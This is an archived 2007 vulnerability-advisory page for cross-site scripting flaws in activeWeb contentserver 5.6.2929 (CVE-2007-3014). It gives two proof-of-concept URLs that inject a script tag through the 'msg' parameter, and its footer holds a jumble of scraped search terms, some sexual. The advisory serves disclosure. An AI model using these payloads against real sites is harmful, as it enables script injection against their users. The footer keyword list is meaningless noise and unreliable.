about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , ActiveWeb Contentserver Multiple Cross-Site Scripting Vulnerabilities


Title ActiveWeb Contentserver Multiple Cross-Site Scripting Vulnerabilities
Published 2007-07-13-12:00AM
Updated 2007-07-13-06:36PM
Class Input Validation Error
CVE   CVE-2007-3014
Remote  Yes
Local  No
Credit  RedTeam Pentesting is credited with the discovery of these vulnerabilities.
Vulnerable  activeWeb contentserver 5.6.2929
Not Vulnerable  
Code  Attackers may exploit these issues through a browser.

The following proofs of concept are available:

http://www.example.com/errors/rights.asp?awReadAccessRight=True&msg=<script>alert('XSS')</script>

http://www.example.com/errors/transaction.asp?msg=<script>alert('XSS')</script>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 14:27:46 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
free downl option,com jrun ESEX image of h synkron Free video php-nuke e 200 /compo sexxy woma news for C Www phoner d-21 shout www.xanx.c sexy mumy bats 200 /compo sex vidio Tagger LE vagina pic www.sexima mambo Remo sex++arabe HOMOSEX BO free sex m namith sex My_eGaller free video GAI HOT .C .19* Searching filer and samPHP invisionpo xxx kamsut www.mv007. Video asia php-nuke 2 t221t www.myhome Jahid www.magicb Hello, nic sexpictuor Meenaphoto vBulletin sex pictur camportal show sex bombey